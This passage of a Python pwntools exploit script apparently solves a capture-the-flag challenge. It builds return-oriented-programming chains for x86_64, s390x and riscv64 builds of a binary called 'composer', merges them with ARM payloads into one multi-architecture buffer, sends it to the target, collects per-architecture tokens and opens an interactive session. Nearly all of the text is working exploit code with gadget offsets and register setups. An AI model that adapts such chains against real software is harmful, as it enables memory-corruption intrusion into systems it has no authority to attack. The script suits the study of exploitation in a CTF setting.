        mov_gadget,
        0, 0, # add rsp, 0x10
        0, # RBX
        x86_64_exe.sym['getchar'],
        x86_64_exe.sym['main'] + 0x63, # mov rdi, r15; call puts
    ]
}, word_size=64, endian='little', filler=b'\0')


#################
##### s390x #####
#################

s390x_exe = ELF('./composer-s390x')
s390x_exe.address = 0x2aa00000000
s390x_stdin_fd = 0x2aa00004090
s390x_stdin_buf = 0x2aa000042c0
s390x_rop_offset = 0x380


payload_s390x = flat({
    # gdb: b *main+0x8c
    # R14, pop registers # lmg %r9,%r15,232(%r15); br %r14
    0x90: s390x_exe.sym['__libc_start_init'] + 0x96,
    0x98: s390x_stack_base + s390x_rop_offset - 0xe8, # R15, saved stack pointer

    s390x_rop_offset: {
        0x8: s390x_stdin_fd - 40 - 4, # R10
        0x10: 42, # R11
        # R14 # stg %r11,40(%r10); lmg %r8,%r15,224(%r15); br %r14
        0x28: s390x_exe.sym['__fwritex'] + 0x122,
        # R15, offsets are such that payload is compact
        0x30: s390x_stack_base + s390x_rop_offset - 0x80,

        0x60: s390x_stdin_buf, # R8
        0x70: s390x_stack_base-0x100, # R10, needs to be read/writeable for this gadget
        0x78: s390x_stack_base + s390x_rop_offset + 0xb0, # R11, begin of function array
        0x90: s390x_exe.sym['__libc_start_init'] + 0x6c, # R14, call function array
        0x98: s390x_stack_base + s390x_rop_offset + 0xb0 - 0xf0, # R15 (stack pointer)

        0xb0: [
            s390x_exe.sym['getchar'],
            s390x_exe.sym['__fwritex'] + 0x118,
        ],

        0xd0: s390x_exe.sym['puts'], # R14
        0xd8: s390x_stack_base + s390x_rop_offset, # R15
    },
}, word_size=64, endian='big', filler=b'\0')


###################
##### riscv64 #####
###################

riscv64_exe = ELF('./composer-riscv64')
riscv64_exe.address = 0x555555556000
riscv64_stdin_fd = 0x555555559090
riscv64_stdin_buf = 0x555555559368
riscv64_array_offset = 0xb0

riscv64_offset_jumps = 3
riscv64_rop_offset = 0x80 * riscv64_offset_jumps

payload_riscv = flat({
    # gdb: b *main+0xe8
    **{
        # addi sp,sp,128; ret
        0x70 + 0x80 * i: riscv64_exe.sym['main'] + 0xce for i in range(riscv64_offset_jumps)
    },

    riscv64_rop_offset: {
        # 0x20: 0, # s9
        # 0x28: 0, # s8
        # 0x30: 0, # s7
        # 0x38: 0, # s6
        0x40: riscv64_stdin_buf, # s5, buffer for puts
        # 0x48: 0, # s4
        # 0x50: 0, # s3
        0x58: riscv64_stdin_fd - 0x28, # s2, file descriptor address
        # 0x60: 0, # s1
        0x68: 42, # FP (s0), file descriptor
        # ra # ld a5,40(s2); mv a0,s3; add a5,a5,s0; sd a5,40(s2)
        0x70: riscv64_exe.sym['__fwritex'] + 0x8c,

        # s0, start of function array
        0x98: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset,
        # s1, end of function array
        0x90: riscv64_rop_offset + riscv64_stack_base + riscv64_array_offset + 0x10,
        0xa0: riscv64_exe.sym['__libc_start_init'] + 0x24, # call function array
        riscv64_array_offset: [
            riscv64_exe.sym['getchar'],
            riscv64_exe.sym['main'] + 0x7c, # puts ( s5 )
        ],
    },
}, word_size=64, endian='little',filler=b'\0')


##########################
##### Merge Payloads #####
##########################

payloads = [
    ('arm', payload_arm),
    ('aarch64', payload_aarch64),
    ('riscv', payload_riscv),
    ('x86_64', payload_x86_64),
    ('s390x', payload_s390x),
]

def key(name_payload):
    return len(name_payload[1])

maxlen = key(max(payloads, key=key))

for (name, payload) in payloads:
    assert b'\n' not in payload, f'Payload for {name} has newlines!'

merged_payload = [0] * maxlen

for i in range(maxlen):
    candidates = {}
    for (name, payload) in payloads:
        if len(payload) > i and  payload[i] != 0:
            candidates[name] = payload[i]
    if len(candidates) > 1:
        error(f'Payloads {list(candidates.keys())} overlap at 0x{i:x}!!!')
    elif len(candidates) == 1:
        merged_payload[i] = candidates.popitem()[1]

for (name, payload) in payloads:
    info(f'{name:10} ' + ''.join(['X' if payload[i:i+8] != bytes(8) else '_' for i in range(0, len(payload), 8)]))

merged_payload = bytes(merged_payload)

###################
##### Exploit #####
###################

r.sendline(b'1')
read_response(r)
r.sendline(bytes(merged_payload))
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

for arch, token in tokens_raw.items():
    success(f'Token for {arch}: {token}')

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()